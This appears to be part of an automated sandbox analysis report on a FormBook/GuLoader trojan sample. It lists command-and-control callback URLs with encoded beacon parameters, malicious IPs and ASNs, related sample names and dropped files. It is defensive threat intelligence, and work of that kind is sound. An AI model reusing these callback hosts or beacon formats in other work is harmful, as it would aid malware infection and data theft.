            		unknowntrueunknown
            www.vgjimei.icu
            		unknown
            		unknowntrue
              		unknown
              www.blissfulbooks.online
              		unknown
              		unknowntrue
                		unknown
                www.shigi.org
                		unknown
                		unknowntrueunknown
                www.digitoxmarketing.com
                		unknown
                		unknowntrue
                  		unknown
                  www.spazisostenibili.org
                  		unknown
                  		unknowntrueunknown
                  www.continentaloilandgas.com
                  		unknown
                  		unknowntrueunknown
                  www.tintasmaiscor.com
                  		unknown
                  		unknowntrueunknown
                  www.weeveno.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.cookwarecentrall.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.issoweb.com
                      		unknown
                      		unknowntrueunknown
                      api.msn.com
                      		unknown
                      		unknowntrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.continentaloilandgas.com/a8pp/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.tintasmaiscor.com/a8pp/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.seductionsessions.co.uk/a8pp/true
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.towelhoodie.com/a8pp/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.peptily.shop/a8pp/?2NlhHLS8=/NPZ6ym1eSqP6E/qwOmQvYjKsz7zkRsccrcByesNZAVEstX0SolnWK8jgzxt8MISaNzEdIb6rnMbXZkqzFIAORFEfuZ8IH0a3kCasVRTZJxsOlTMl/y3o9s=&0z=jXZhddsppLtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.click-advertising.net/a8pp/?2NlhHLS8=Dft4chLLB7HQRgI1kvQb3UGdiigcwJaJso3MJc+IJoTJW0I2amM0Xj+YeLw4jIoNvtXY/7GemIMI+dXc5vnp9QE1cggkijBoQvQelzZ8ig3DEoIcGDshdqY=&0z=jXZhddsppLtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.nurse-job2535.life/a8pp/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.blissfulbooks.online/a8pp/?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppLfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.nurse-job2535.life/a8pp/?2NlhHLS8=ZUQ1TL0seNvx54VLi4j8goKVXeEHsH3HvniJXC80qaRkGy2/Bav7bR6THbfzZ3GDEHeASBxbKXGg0EinUgac1wLiet4LPvLUzSGHrF52u0MP0A2xTBnpXUY=&0z=jXZhddsppLtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.seductionsessions.co.uk/a8pp/?2NlhHLS8=u2uhCbPEKv8ZkpElCasipCYoh7hjVHsJeshUYXe+26UO54wjNRlGrJIqe2/bB2Gg6hxh2QUpPcZvKht3Zd5FEOczln0DFiPIHlW4j3CMtDHw4ZJy68kQvjE=&0z=jXZhddsppLtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.barrettdigitalart.com/a8pp/true
                      • Sophos S4: malware callhome domain
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.click-advertising.net/a8pp/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.calmparents.us/a8pp/?2NlhHLS8=NgQpJdLFdHgIa+1l29O1770Oq5lPJcvTMZvJdcQ/YcKsMhli5q4lfY4xaSICRuQBpvWxqNirPVzUz7JPsPacp8Mg1AroxlnuY82gnIQ9XdoCkQd3w5aTNck=&0z=jXZhddsppLtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.vgjimei.icu/a8pp/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.blissfulbooks.online/a8pp/false
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.continentaloilandgas.com/a8pp/?2NlhHLS8=eXj7agnwQ7UtDQTI2/QeRjNOKmxKRYHEwlq+kXNt3DleoKuUYGucHmIzSo9PpxNipdSpHjsdoNiIZ3Hh69GYDO27Wp3lPM6WDcDlV706K5XwonPjk8UKoRY=&0z=jXZhddsppLtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.shootprecious.com/a8pp/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.shootprecious.com/a8pp/?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppLtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.towelhoodie.com/a8pp/?2NlhHLS8=IPQzDRTPddNuZ/HMr4F9le4A0likp4cPjTBZoWar0DW2Dke1nHX7p3PJPbmWMxtVZQ2vG/Syy6/u7vfLcEQjJE0ZPWoRIvOz07zRtU0HA7dN58xUlB4x570=&0z=jXZhddsppLtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.tintasmaiscor.com/a8pp/?2NlhHLS8=4Lb2evqbqWm/eQEsCRZbIPf+4WOFbtHQ6zBEferLjExJaXLZsL3GLbWlHTrS18+QwpI6CqjMoX8o4lQjVBd1hnajfrB87pxWL6PWkXnwG2oHKjYPIKLzKN0=&0z=jXZhddsppLtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.astralavenue.xyz/a8pp/?2NlhHLS8=Au5imsmV21JYiQqAtZZYW5jQMTc/TsZAtUnDsMKbX4YoEplVSL6Rm/9dTWFSyViTXIIw8p1ls4ghLUagt/HJKO94HieJHgrJIyAOML3UnsK6ear2OzXGe/M=&0z=jXZhddsppLtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.barrettdigitalart.com/a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppLtrue
                      • Sophos S4: malware callhome domain
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.calmparents.us/a8pp/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.cyberpsychsecurity.com/a8pp/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.cyberpsychsecurity.com/a8pp/?2NlhHLS8=eq13gBt76ePDaE9jPC0A9Iupd/gjzDBrOAbtoaeLD+8wGtFf895L9qocKFTqmVpd7xt5UEIOF7l9ga++P+8IeJMZhOURtvON+WXuvIh3J+ggFIDS+M1ogAg=&0z=jXZhddsppLtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.astralavenue.xyz/a8pp/true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.gandi.net/en/domainrunonce.exefalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://nsis.sf.net/NSIS_ErrorErrorulACwpUCSU.exe, 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000000.00000000.2283075526.0000000000409000.00000008.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000003.00000000.2705727166.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000626000.00000020.00000001.01000000.00000007.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.gopher.ftp://ftp.ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.google.comulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdulACwpUCSU.exe, 00000003.00000001.2708155716.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://nsis.sf.net/NSIS_ErrorulACwpUCSU.exe, ulACwpUCSU.exe, 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000000.00000000.2283075526.0000000000409000.00000008.00000001.01000000.00000003.sdmp, ulACwpUCSU.exe, 00000003.00000000.2705727166.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdulACwpUCSU.exe, 00000003.00000001.2708155716.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://apis.google.comulACwpUCSU.exe, 00000003.00000003.2866087352.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, ulACwpUCSU.exe, 00000003.00000003.2865688162.0000000007560000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      162.240.81.18
                      		tintasmaiscor.comUnited States
                      		46606UNIFIEDLAYER-AS-1UStrue
                      162.0.237.22
                      		www.astralavenue.xyzCanada
                      		22612NAMECHEAP-NETUStrue
                      192.207.62.21
                      		02.32.jtrhc.funUnited States
                      		394180HOSTBREWUStrue
                      23.227.38.74
                      		shops.myshopify.comCanada
                      		13335CLOUDFLARENETUStrue
                      64.190.62.22
                      		www.nurse-job2535.lifeUnited States
                      		11696NBS11696UStrue
                      91.195.240.19
                      		parkingpage.namecheap.comGermany
                      		47846SEDO-ASDEtrue
                      142.250.217.174
                      		drive.google.comUnited States
                      		15169GOOGLEUSfalse
                      34.120.137.41
                      		connect.hostinger.comUnited States
                      		15169GOOGLEUSfalse
                      23.82.12.29
                      		www.seductionsessions.co.ukUnited States
                      		30633LEASEWEB-USA-WDCUStrue
                      160.124.114.188
                      		www.click-advertising.netSouth Africa
                      		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                      172.67.205.56
                      		www.barrettdigitalart.comUnited States
                      		13335CLOUDFLARENETUStrue
                      217.70.184.50
                      		webredir.vip.gandi.netFrance
                      		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                      142.250.217.193
                      		drive.usercontent.google.comUnited States
                      		15169GOOGLEUSfalse

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1451688
                      Start date and time:2024-06-04 14:31:03 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 18m 57s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                      Run name:Suspected Instruction Hammering
                      Number of analysed new started processes analysed:6
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Sample name:ulACwpUCSU.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/22@30/13
                      EGA Information:
                      • Successful, ratio: 75%
                      HCA Information:
                      • Successful, ratio: 87%
                      • Number of executed functions: 100
                      • Number of non-executed functions: 274
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                      • Excluded IPs from analysis (whitelisted): 131.253.33.203
                      • Excluded domains from analysis (whitelisted): icePrime.a-0003.dc-msedge.net, ctldl.windowsupdate.com, a-0003.dc-msedge.net, nexusrules.officeapps.live.com, api-msn-com.a-0003.a-msedge.net
                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      08:34:53API Interceptor24237183x Sleep call for process: runonce.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      162.240.81.189hD6o07kwl.exeGet hashmaliciousFormBookBrowse
                      • www.agoraeubebo.com/0so0/
                      DEBIT NOTE.exeGet hashmaliciousFormBookBrowse
                      • www.upshercode.store/mjwv/
                      PROFORMA INV.pif.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • www.cutekut.online/14gb/?tBwH=bFCkD+Iw/IIdpRiBIJLC1iUBk0csq5OdabFzeugixG1/PELPjQ/1w+lE581YRetP2T9dZxUUBpn36HyXKtFbrJt88Vl3fipSYjf6IYvK9riTq8zZ8w==&fJ=f4sTJ
                      PO JAN 2024.exeGet hashmaliciousFormBookBrowse
                      • www.marinamaquiagens.online/pe9h/
                      PI No 20000814C.exeGet hashmaliciousFormBookBrowse
                      • www.upshercode.store/x98j/
                      PO Copy_7854569.exeGet hashmaliciousFormBookBrowse
                      • www.tintasmaiscor.com/a42m/
                      SSDQ115980924.exeGet hashmaliciousFormBookBrowse
                      • www.upshercode.store/x98j/
                      F2qfVHeuUh.exeGet hashmaliciousFormBookBrowse
                      • www.tintasmaiscor.com/a42m/?AP00=BaBbynwG2FaMiw+hmoeFnG4PrZfHHbpnPsDfKOVNrs70A5vduIAG3AN1jPdCIStIA9EjWNWwwUOGmupZW6v0QrzsBcsVqVXvouqOWRe0ntuSf7iSy2xcb+U=&P6V=btjH
                      ENQUIRY OFFER.xlsGet hashmaliciousFormBookBrowse
                      • www.tintasmaiscor.com/a42m/
                      3mquY2sUcn.exeGet hashmaliciousFormBookBrowse
                      • www.tintasmaiscor.com/a42m/
                      162.0.237.22PO Copy_7854569.exeGet hashmaliciousFormBookBrowse
                      • www.crimsoncascade.xyz/a42m/
                      EST- 250424-0370pdf.exeGet hashmaliciousFormBookBrowse
                      • www.deaybrid.info/kr6p/?SZ=HaJFZho8Nn16sg//6ib2nk7c2+vkBSZR2YpvIexP2qZw/StZPUfmsLsuuV/LBKRGJiaNBLxYMlLi0QylbMozyF2WOugBIyjyrBKtdaOSXYuxeu2j/WRDnQUVO3VI+uF6uQ==&KZS0W=rx6X7x9
                      Okthabah.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • www.falstru.xyz/z912/
                      Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • www.falstru.xyz/ntpp/
                      F2qfVHeuUh.exeGet hashmaliciousFormBookBrowse
                      • www.crimsoncascade.xyz/a42m/?AP00=OaCxij+az8CWZkVV4Z97hLXhpPYtYBvJsZdPmSHU0RFVoK/pLfrBJ2MjeSz+pAxrgiF9enqzkwmMWhrDz0ZQoeYZo+3MdHNHxcVQy6J8EXmdTI/Q3w31j8s=&P6V=btjH
                      Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                      • www.deaybrid.info/mcz6/
                      Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • www.falstru.xyz/ntpp/
                      3mquY2sUcn.exeGet hashmaliciousFormBookBrowse
                      • www.crimsoncascade.xyz/a42m/
                      Factura (3).exeGet hashmaliciousFormBookBrowse
                      • www.deaybrid.info/mcz6/
                      WaybillDoc_43948767.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • www.shevgin.top/gzu1/
                      192.207.62.2112nTpM7hB1.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • www.xehairen.icu/q696/
                      OSL332C-HBLx#U180es#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                      • www.xehairen.icu/q696/

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      parkingpage.namecheap.comfJuwM4Bwi7.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 91.195.240.19
                      9hD6o07kwl.exeGet hashmaliciousFormBookBrowse
                      • 91.195.240.19
                      TFMUpLhFq6.exeGet hashmaliciousFormBookBrowse
                      • 91.195.240.19
                      g7cydE7LET.exeGet hashmaliciousFormBookBrowse
                      • 91.195.240.19
                      cjHq1JOaAQ.exeGet hashmaliciousFormBookBrowse
                      • 91.195.240.19
                      vtIgsP95Bm.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                      • 91.195.240.19
                      CHKS2400304.pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                      • 91.195.240.19
                      yPURXYpFVuXra2o.exeGet hashmaliciousFormBookBrowse
                      • 91.195.240.19
                      BASF Purchase Order.docGet hashmaliciousFormBookBrowse
                      • 91.195.240.19
                      yiLe926pJsBgixu.exeGet hashmaliciousFormBookBrowse
                      • 91.195.240.19
                      www.astralavenue.xyzListe d'inventaire.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 162.0.237.22
                      Transaction advice.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 162.0.237.22
                      SARAY_RECEIPT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 162.0.237.22
                      webredir.vip.gandi.netMekanikken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 217.70.184.50
                      4TH HIRE SOA REMITTANCE_USD280,000.exeGet hashmaliciousFormBookBrowse
                      • 217.70.184.50
                      Nondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 217.70.184.50
                      KT-L068310.exeGet hashmaliciousFormBookBrowse
                      • 217.70.184.50
                      Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 217.70.184.50
                      Telescribe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 217.70.184.50
                      Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 217.70.184.50
                      2024_04_005.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 217.70.184.50
                      Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 217.70.184.50
                      DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exeGet hashmaliciousFormBookBrowse
                      • 217.70.184.50
                      www.click-advertising.netvenerationens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 160.124.114.188
                      FedEx_773609516146.exeGet hashmaliciousFormBookBrowse
                      • 160.124.114.188
                      shops.myshopify.comUtility R.lnkGet hashmaliciousFormBookBrowse
                      • 23.227.38.74
                      https://b2a6b3-40.myshopify.com/_t/c/A1020005-17D582A5E5C700C4-41C65D11?l=AABOE1En7mY7fIxXWOoxNlkFZ27UjJAkXtBBIOMORgXvtq7SjCGqSnB1BoxETCzebYwSdk/Zcmv4gZjf5u0DJtyRcL/nJjeqWX7Nbum04fMX+WVakp5LNEtbxTZxUyFqZ5535oA0aCUcyNZpXBipudkp&c=AABoCwiRIWoJ4OVr9aOuYq0W+fPXvBycUWU7egZym/103DUqiL/gs/X5GabCGF2T6tGL+rSgl4C7tJbJ2KS61EeO1hhCreQA8X97uaUvje2mBVkkQvPbwjdpIM30AJIPMDxnuu8MV0M5VT8s5kPvSUlsH4ih0NApULPsFyTEkxP/AiVWyfHlxutMGfslAX0HDI8sgkrwLRCm2sFlp9f/fqjsT0OFw2ecQx4ZF+EUYWnFL9CaaXWIr7LoRJWjkzr8C52tASMOlKwAjTVZKsP/Oevb+sUIHnbaWI8oQGEre+YLMou7GmMJL1vNrJUNEQyj9Slb5ZM5EdIutaaisUMHJAIxSGPJZOkLDdl/TK5WLtgX6NrJK90mpEkmZ4Vf9HD6MgYK+9N4vRndjM5XfK8gDsBwwkjb8f619pX0lGXu5ZceUFDjgm8/Pm1K19cfGlroUrSXYLXAd+N8tIyLPwBgXJ7NapwhY0VnksTFfdVMFxg6D2l0RyWmHqCXMiBN7L48KDpXqjKHZ/v/MZe0cO2BTy6tr51wRKfXi2RCZTZ+gJHT6rdg4sXti32m4fSX5TB7NfZoDpEPcfwt187i5GSNi2NVDcZ5HFSvjrHlcTm6mXA616Xq5kXBDLMgBn52joRna/N74JUtmdgiR26DrEssiMqd8PWUY9+QBtJh8TUHV0On0ri9VufCGet hashmaliciousUnknownBrowse
                      • 23.227.38.74
                      Etisalat Summary Bill for the Month of May.exeGet hashmaliciousFormBookBrowse
                      • 23.227.38.74
                      aertrh.exeGet hashmaliciousFormBookBrowse
                      • 23.227.38.74
                      MAWB# 695-47123101 - PN1 MOL MAESTRO V-073E..scr.exeGet hashmaliciousFormBookBrowse
                      • 23.227.38.74
                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                      • 23.227.38.74
                      PO JAN 2024.exeGet hashmaliciousFormBookBrowse
                      • 23.227.38.74
                      Offer Document 23.lnkGet hashmaliciousFormBookBrowse
                      • 23.227.38.74
                      https://shop.ketochow.xyz/Get hashmaliciousUnknownBrowse
                      • 23.227.38.74
                      qtCWL0lgfX.exeGet hashmaliciousFormBookBrowse
                      • 23.227.38.74

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      NAMECHEAP-NETUScbIcBAgY5W.exeGet hashmaliciousSystemBCBrowse
                      • 198.54.122.136
                      http://wvmy.bet/Get hashmaliciousUnknownBrowse
                      • 162.255.119.239
                      hesaphareketi_01.exeGet hashmaliciousAgentTeslaBrowse
                      • 198.54.114.199
                      Employee Perfomance Record.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                      • 162.255.119.138
                      PO 886060324.exeGet hashmaliciousFormBookBrowse
                      • 199.188.201.135
                      https://engaging-activity-ac4ca3f199.media.strapiapp.com/33_5711a9a219.html#abc@gmail.comGet hashmaliciousHTMLPhisherBrowse
                      • 198.54.114.176
                      https://afrikikoresort.com/Get hashmaliciousUnknownBrowse
                      • 63.250.38.71
                      Requirement Specification.exeGet hashmaliciousAgentTeslaBrowse
                      • 198.54.114.199
                      dMY6QiHAIpPPqiV.exeGet hashmaliciousFormBookBrowse
                      • 199.192.19.19
                      img_RFQ CHEM_REF - Aanbesteding - PROJECT 90016288247_pdf.exeGet hashmaliciousAgentTeslaBrowse
                      • 198.54.122.135
                      NBS11696USMekanikken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 64.190.62.22
                      PO JAN 2024.exeGet hashmaliciousFormBookBrowse
                      • 64.190.63.222
                      Nondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 64.190.62.22
                      Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 64.190.62.22
                      file.exeGet hashmaliciousUnknownBrowse
                      • 64.190.63.222
                      SecuriteInfo.com.Trojan.StarterNET.7.17684.18588.exeGet hashmaliciousCrypt888Browse
                      • 64.190.63.136
                      Telescribe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 64.190.62.22
                      RE Draft BL for BK#440019497 REF#388855.exeGet hashmaliciousFormBookBrowse
                      • 64.190.62.22
                      WaybillDoc_43948767.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 64.190.62.22
                      ZAM#U00d3WIENIE_NR.2405073.exeGet hashmaliciousDBatLoader, FormBookBrowse
                      • 64.190.62.22
                      UNIFIEDLAYER-AS-1US9hD6o07kwl.exeGet hashmaliciousFormBookBrowse
                      • 162.240.81.18
                      cbIcBAgY5W.exeGet hashmaliciousSystemBCBrowse
                      • 192.185.211.72
                      td2RgV6HyP.exeGet hashmaliciousSystemBCBrowse
                      • 70.40.217.137
                      FedEx_102235507463.exeGet hashmaliciousAgentTeslaBrowse
                      • 192.185.143.105
                      http://registrefilcomannelle.ac-page.com/examenh/Get hashmaliciousUnknownBrowse
                      • 50.116.87.128
                      https://agora.zanichelli.it/zcloud/zc/trac_r.php?cosa=https://ativomacae.com/apache/tkyhmlq0pz/sjrnvkm/6Z2TVsSmK6rTO1Smsg8TiLy-YW5pc2hpZGFAaW1heC5jb20=Get hashmaliciousUnknownBrowse
                      • 192.185.208.56
                      MONTHLY SOA AGENT MAR-MAY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      • 162.144.15.236
                      Shipping Documents_pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                      • 108.179.234.136
                      SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.25325.32677.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                      • 192.185.117.4
                      vtIgsP95Bm.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                      • 69.49.241.24
                      HOSTBREWUS12nTpM7hB1.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • 192.207.62.21
                      OSL332C-HBLx#U180es#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                      • 192.207.62.21
                      odSNe417qU.elfGet hashmaliciousBillGatesBrowse
                      • 192.207.62.45
                      wow.exeGet hashmaliciousMetasploitBrowse
                      • 74.114.158.110
                      CLOUDFLARENETUShttps://cosjena.pl/ygt/idbdcdthghGet hashmaliciousUnknownBrowse
                      • 188.114.97.3
                      https://www.brownfieldagnews.comGet hashmaliciousUnknownBrowse
                      • 104.18.11.207
                      hnflypVwJ2.exeGet hashmaliciousRedLineBrowse
                      • 104.20.4.235
                      oPQtUCeecT.exeGet hashmaliciousAgentTeslaBrowse
                      • 104.26.13.205
                      9hD6o07kwl.exeGet hashmaliciousFormBookBrowse
                      • 172.67.223.246
                      http://doctorpimentel.comGet hashmaliciousUnknownBrowse
                      • 104.17.25.14
                      https://o0947snr.loginprotect.net/?d=U2U-DIr_4nzMdgg8og19LGet hashmaliciousUnknownBrowse
                      • 104.16.124.96
                      Y0oepe4nYS.exeGet hashmaliciousUnknownBrowse
                      • 172.67.199.95
                      https://www.sordum.org/downloads/?ntfs-drive-protectionGet hashmaliciousUnknownBrowse
                      • 104.18.24.173
                      Financial Invoice Report - STI ME-3051-2024.exeGet hashmaliciousAgentTeslaBrowse
                      • 172.67.74.152

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      37f463bf4616ecd445d4a1937da06e19fJuwM4Bwi7.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 142.250.217.193
                      • 142.250.217.174
                      SecuriteInfo.com.Win32.Malware-gen.15356.26888.exeGet hashmaliciousUnknownBrowse
                      • 142.250.217.193
                      • 142.250.217.174
                      SecuriteInfo.com.Win32.Malware-gen.15356.26888.exeGet hashmaliciousUnknownBrowse
                      • 142.250.217.193
                      • 142.250.217.174
                      SecuriteInfo.com.Win32.Malware-gen.11549.10024.exeGet hashmaliciousGuLoaderBrowse
                      • 142.250.217.193
                      • 142.250.217.174
                      file.exeGet hashmaliciousVidarBrowse
                      • 142.250.217.193
                      • 142.250.217.174
                      SAMPLE _CATALOGUE_EWF_PDF.com.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 142.250.217.193
                      • 142.250.217.174
                      SALES CONF AH-SC-17-2024.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                      • 142.250.217.193
                      • 142.250.217.174
                      PackingList#_2E0688.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                      • 142.250.217.193
                      • 142.250.217.174
                      Quotation Request - RFQ018232901983234.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                      • 142.250.217.193
                      • 142.250.217.174
                      Nedfrendes.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                      • 142.250.217.193
                      • 142.250.217.174

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dllfJuwM4Bwi7.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        fJuwM4Bwi7.exeGet hashmaliciousGuLoaderBrowse
                          Factura 02297-23042024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              Factura 02297-23042024.exeGet hashmaliciousGuLoaderBrowse
                                anebilledes.exeGet hashmaliciousGuLoaderBrowse
                                  Purchase Order1613400027654123.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    Purchase Order1613400027654123.pdf.exeGet hashmaliciousGuLoaderBrowse
                                      windows.10.codec.pack.v2.2.0.setup.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Lumbagoen.lnk

                                        Download File
                                        Process:C:\Users\user\Desktop\ulACwpUCSU.exe
